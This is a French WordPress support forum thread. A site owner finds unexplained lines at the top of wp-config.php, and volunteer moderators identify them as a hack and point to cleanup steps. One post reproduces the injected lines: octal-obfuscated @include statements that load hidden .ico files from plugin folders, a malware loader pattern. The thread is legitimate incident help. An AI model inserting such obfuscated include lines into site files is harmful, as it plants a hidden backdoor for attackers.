config.php (Créer un compte)

  • WordPress :6.4
  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 18)
  • Auteur
    Messages
  • #2465536
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Bonjour,

    Ma configuration WP actuelle :
    – Version de WordPress : 6.4.2
    – Version de PHP/MySQL : 7.3.33 / 5.7.42
    – Thème utilisé : StyleShop
    – Thème URI : http://www.elegantthemes.com/gallery/
    – Extensions en place : Accordions Combo (2.2.96), Advanced Database Cleaner (3.1.3), Airpress (1.1.64), Akismet Anti-spam: Spam Protection (5.3), CAPTCHA 4WP (7.4.0), Classic Editor (1.6.3), DAP Easy Installer (2.1), DigitalAccessPass LiveLinks (21.3), Elegant Themes Updater (1.2), Forum_wordpress_fr (4.2), IM8 Exclude Pages (2.7), Ivory Search (5.5.4), OptimizePress (2.5.26), Query Monitor (3.12.3), Re-add text underline and justify (0.4), Redirect After Comment Per Page (0.9.5), Robin image optimizer (1.6.6), S3MediaVault Pro (5.0), SiteAlert (Formerly WP Health) (1.9.7), Subscribe to Comments Reloaded (220725), UnderConstructionPage PRO (5.74), UpdraftPlus – Backup/Restore (1.23.16), Vision (1.7.0), WickedCoolPlugins License Key (1.0), Wordfence Security (7.11.0), WPCode Lite (2.1.7)
    – Adresse du site : https://touchezlebouddha.com
    – Nom de l’hébergeur : Apache

     

    Problème(s) rencontré(s) :

    un développeur de chez Digital Access Pass me demande pourquoi en tout début du fichier  config.php

    se trouvent ces lignes :

    Édit modération : retrait du lien vers l’image. Remplacé par image en pièce jointe ci-dessous.

     

    je ne les ai pas codées.

    Avez-vous une idée ?

    Il les a enlevées.

    Merci

    • Ce sujet a été modifié le il y a 11 mois et 1 semaine par ferman.
    • Ce sujet a été modifié il y a 11 mois et 1 semaine par Flobogo. Raison : édit modération
    • Ce sujet a été modifié le il y a 11 mois et 1 semaine par Flobogo.
    Fichiers joints :
    Vous devez être connecté pour voir les fichiers joints.
    #2465553
    ferman
    Modérateur
    Maître WordPress
    7301 contributions

    Bonjour,

    Les lignes bla bla .ico en tête de wp-config sont très suspectes et ça ressemble fort à un piratage.  Voyez-vous des lignes du même genre dans un autre fichier. En particulier index.php?

    Et comme vous donnez sur le forum des renseignements confidentiels, vous devriez changer au moins le mot de passe de votre base de données.

    • Cette réponse a été modifiée le il y a 11 mois et 1 semaine par ferman.
    #2465558
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Merci

    Quelles infos confidentielles j’ai données?

    #2465559
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    La fichier index.php est vierge :

     

    <?php
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define( ‘WP_USE_THEMES’, true );

    /** Loads the WordPress Environment and Template */
    require __DIR__ . ‘/wp-blog-header.php’;

    #2465565
    ferman
    Modérateur
    Maître WordPress
    7301 contributions

    La fichier index.php est vierge :

    Peut-être y-a-t-il eu une tentative avortée de piratage ou un reste de piratage après nettoyage? Les deux lignes décodées  donnent ce qui suit:

    « @include /home/touchezlvo/www/dap/plugins/arpreach/.658095d7.ico »

    « @include /home/touchezlvo/www/wp-content/plugims/forum-wordpress-fr/.86c4e3e8.ico

    D’après ce que je comprends, la première ligne pointe vers un fichier .658095d7.ico  dans  le dossier dap/plugins/arpreach . Je dirais que c’est un dossier pirate. Même chose pour la deuxième ligne. Il faudrait vérifier si ces deux fichiers existent vraiment et ce qu’ils contiennent. Il faudrait aussi vérifier que les lignes effacées ne reviennent pas (ça peut être n’importe où dans les dossiers du site) après avoir été effacées. Vous pouvez facilement chercher ces lignes et dossiers avec notepad++ (fonction chercher dans les sous dossiers).

    Vous pouvez voir ICI la nature du piratage , que peut-être vous n’avez pas (mais peut -être que si. A vérifier.).

    Quelles infos confidentielles j’ai données?

    Regardez ce que contient l’image que vous avez envoyée.

    • Cette réponse a été modifiée le il y a 11 mois et 1 semaine par ferman.
    #2465575
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Merci <span class= »bbp-author-avatar »></span><span class= »bbp-author-name »>Flobogo</span>.  pour votre modération de mon post avec la suppression des infos sensible sur l’image que j’avais partagée….

    #2465576
    Flobogo
    Modérateur
    Maître WordPress
    20578 contributions

    De rien. 🙂

    Maintenant, je vous conseille de suivre complètement ce tuto de nettoyage pour site infecté, sans attendre que le virus se propage et crée des redirections vers des sites externes.

    #2465577
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Merci

    #2465605
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Bonjour

    j’ai modifié le mot de passe de la base de donnée mais le site est planté.

    Sans doute suite à cette modification.

    Ne m’aviez vous pas dit d’aller modifier ce mot de passe dans certains fichiers ?

    Je ne retrouve pas cette info…

    Merci

    #2465608
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Ces deux lignes sont à nouveau en tout début du fichier wp-config.php…  🙁

    <?php

    /*/*5774c*/
    //@include « \057home\057touc\150ezlv\157/www\057dap/\160lugi\156s/ar\160reac\150/.65\070095d\067.ico »;
    /*5774c*/
    //@include « \057h\157m\145/\164o\165c\150e\172l\166o\057w\167w\057w\160-\143o\156t\145n\164/\160l\165g\151n\163/\146o\162u\155-\167o\162d\160r\145s\163-\146r\057.\0706\1434\1453\1458\056i\143o »;
    /**

    #2465612
    ferman
    Modérateur
    Maître WordPress
    7301 contributions

    Bonjour,

    Ne m’aviez vous pas dit d’aller modifier ce mot de passe dans certains fichiers ?

    Oui, dans wp-config.

    Ces deux lignes sont à nouveau en tout début du fichier wp-config.php…

    Ce comportement est signalé dans l’article dont je vous avais donné le lien et confirme que le piratage est bien là (et donc qu’il faut suivre le tuto de désinfection recommandé par @flobogo.)

    #2465618
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Je vous remercie.

    Suite à une alerter de WordPress concernant le plug in Updraft, j’ai renommer le dossier updraft « uupdraft ».

    J’ai voulu le renommer à nouveau updraft mais cela m’est refusé car il y a un autre dossier updraft.

    Est ce que le renommage uupdraft aurait crée un 2e dossier updraft ?

     

    Dossier updraft :

    weconfig

    index.html

    .htaccss

     

    Dossier uupdraft :

    web.config

    divers dossier log

    dossiers backup

    htaccess

     

    J’ai procédé au retour à la base de donnée du 2/02 mais le site est planté.

    Alors que le 2 il marchait.

    #2465619
    Arnaud G.
    Participant
    Padawan WordPress
    97 contributions

    Bon, j’ai rapatrié les fichiers de uupdaft dans updraft.

    Êtes vous prestataire de service?

    #2465624
    ferman
    Modérateur
    Maître WordPress
    7301 contributions

    Non, ni @flobogo ni moi ne le sommes. Juste bénévoles du forum.

    #2465629
    bill57
    Participant
    Maître WordPress
    858 contributions
15 sujets de 1 à 15 (sur un total de 18)
  • Vous devez être connecté pour répondre à ce sujet.